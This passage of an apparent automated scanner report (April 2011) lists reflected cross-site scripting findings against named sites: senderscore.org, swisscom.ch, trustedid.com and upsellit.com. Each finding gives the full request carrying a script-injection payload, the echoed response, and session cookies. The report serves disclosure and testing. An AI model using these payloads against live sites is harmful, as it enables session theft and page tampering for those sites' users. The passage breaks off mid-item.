Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:31:14 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:31:14 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=ohgii98aftv0beigrnlmjltkd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<form action="/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQb19e2"><script>alert(1)</script>321176dfabb" method="post" name="form1" id="form1" onsubmit="this.submit.disabled=true;">
...[SNIP]...

6.392. https://www.senderscore.org/landing/ppcregistration/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5c34"><script>alert(1)</script>83e780a2067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ&b5c34"><script>alert(1)</script>83e780a2067=1 HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:31:24 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:31:24 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=4qcd4mhusjl7ff054bp1sqr7f1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3389150218.20480.0000; path=/
Content-Length: 33373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<form action="/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ&b5c34"><script>alert(1)</script>83e780a2067=1" method="post" name="form1" id="form1" onsubmit="this.submit.disabled=true;">
...[SNIP]...

6.393. https://www.senderscore.org/landing/ppcregistration/index.php [s_kwcid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The value of the s_kwcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 523f9"><script>alert(1)</script>fc5deea9291 was submitted in the s_kwcid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451523f9"><script>alert(1)</script>fc5deea9291&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:31:15 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:31:15 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=u856ucnitvv04gpk8r7em4ojp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3389150218.20480.0000; path=/
Content-Length: 33370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<form action="/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451523f9"><script>alert(1)</script>fc5deea9291&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ" method="post" name="form1" id="form1" onsubmit="this.submit.disabled=true;">
...[SNIP]...

6.394. http://www.swisscom.ch/res/hilfe/kontakt/index.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.swisscom.ch
Path:   /res/hilfe/kontakt/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf0e4"%3b751af77e4a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf0e4";751af77e4a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /res/hilfe/kontakt/index.htm?cf0e4"%3b751af77e4a1=1 HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Contact/Contact.aspx?lang=it&plang=it
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:01:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=kocmwvja0dqz2555bswq0b45; path=/
Set-Cookie: languageId=en; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49661
X-Cache: MISS from www.swisscom.ch


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...
avascript">
var flashvars = {NRMODE: "Published", NRNODEGUID: "{41B20264-4E31-47DA-BEF7-C557E2AC729C}", NRORIGINALURL: "/res/hilfe/kontakt/index.htm?cf0e4"%3b751af77e4a1=1", NRCACHEHINT: "Guest", cf0e4";751af77e4a1: "1"};
var params = {wmode: "transparent", allowscriptaccess: "always"};
</script>
...[SNIP]...

6.395. http://www.swisscom.ch/res/hilfe/kontakt/index.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.swisscom.ch
Path:   /res/hilfe/kontakt/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload efacc(a)378206c5ffc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /res/hilfe/kontakt/index.htm?efacc(a)378206c5ffc=1 HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Contact/Contact.aspx?lang=it&plang=it
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:01:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=5vazvc55m5vww2zvv0lvkw45; path=/
Set-Cookie: languageId=en; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49636
X-Cache: MISS from www.swisscom.ch


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...
javascript">
var flashvars = {NRMODE: "Published", NRNODEGUID: "{41B20264-4E31-47DA-BEF7-C557E2AC729C}", NRORIGINALURL: "/res/hilfe/kontakt/index.htm?efacc(a)378206c5ffc=1", NRCACHEHINT: "Guest", efacc(a)378206c5ffc: "1"};
var params = {wmode: "transparent", allowscriptaccess: "always"};
</script>
...[SNIP]...

6.396. http://www.swisscom.ch/res/hilfe/kontakt/index.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.swisscom.ch
Path:   /res/hilfe/kontakt/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9eed"><a>4769df05778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /res/hilfe/kontakt/index.htm?e9eed"><a>4769df05778=1 HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Contact/Contact.aspx?lang=it&plang=it
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=wklt3leyzqy3sj452pgvwi45; path=/
Set-Cookie: languageId=en; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49715
X-Cache: MISS from www.swisscom.ch


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...
<a href="/res/hilfe/kontakt/index.htm?languageId=de&e9eed"><a>4769df05778=1">
...[SNIP]...

6.397. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd735"><script>alert(1)</script>6c8574a0de7 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<a href="/?promoRefCode=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7" class="lp-get-ide-link">
...[SNIP]...

6.398. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee863'><script>alert(1)</script>c9c8e536919 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<input type='hidden' name='promo' value='NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919'/>
...[SNIP]...

6.399. https://www.trustedid.com/idfide01/ [promoCodeRefIdf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIdf request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5092'><script>alert(1)</script>11d7a4f151a was submitted in the promoCodeRefIdf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:14:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10480

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<input type='hidden' name='promo' value='NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a'/>
...[SNIP]...

6.400. https://www.trustedid.com/suzeidprotector/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85c56"><script>alert(1)</script>0c0f9b808c2 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=&last_name=&email=85c56"><script>alert(1)</script>0c0f9b808c2 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="85c56"><script>alert(1)</script>0c0f9b808c2" id="email" name="email" gtbfieldid="3">
...[SNIP]...

6.401. https://www.trustedid.com/suzeidprotector/ [first_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3782"><script>alert(1)</script>f649900f46c was submitted in the first_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=e3782"><script>alert(1)</script>f649900f46c&last_name=&email= HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:54:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="e3782"><script>alert(1)</script>f649900f46c" id="first_name" name="first_name" gtbfieldid="1">
...[SNIP]...

6.402. https://www.trustedid.com/suzeidprotector/ [last_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87203"><script>alert(1)</script>ef9dea1c101 was submitted in the last_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=&last_name=87203"><script>alert(1)</script>ef9dea1c101&email= HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:55:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="87203"><script>alert(1)</script>ef9dea1c101" id="last_name" name="last_name" gtbfieldid="2">
...[SNIP]...

6.403. http://www.upsellit.com/upsellitJS4.jsp [qs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.upsellit.com
Path:   /upsellitJS4.jsp

Issue detail

The value of the qs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f462'%3balert(1)//a73cfd7e7df was submitted in the qs parameter. This input was echoed as 2f462';alert(1)//a73cfd7e7df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upsellitJS4.jsp?qs=2372742232053353072912983123233122982913122932773353413343222f462'%3balert(1)//a73cfd7e7df&siteID=5512&trackingInfo=http%3A//roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com
Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; uid=CgoKBU20gu++zjv3FP/AAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:25:46 GMT
Content-Type: text/html
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11356

var USItimerID = '';
var properClickThrough = false;
var USIdone = false;
var USI_suppress = false;
if (typeof(noChatPlease) != "undefined") {
   if (noChatPlease) {
   properClickThrough = true; US
...[SNIP]...
<param name="FlashVars" value="chatskin=_standard.gif&ip=www.upsellit.com&qs=2372742232053353072912983123233122982913122932773353413343222f462';alert(1)//a73cfd7e7df&siteID=5512&trackingInfo=http://roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/&browserType=-1&configurationID=&link1=&link2=&link3=&openerLines=&chatID=&agentImg=&transDiv=0&agentIsTypingTxt=&youTex
...[SNIP]...

6.404. http://www.upsellit.com/upsellitJS4.jsp [trackingInfo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.upsellit.com
Path:   /upsellitJS4.jsp

Issue detail

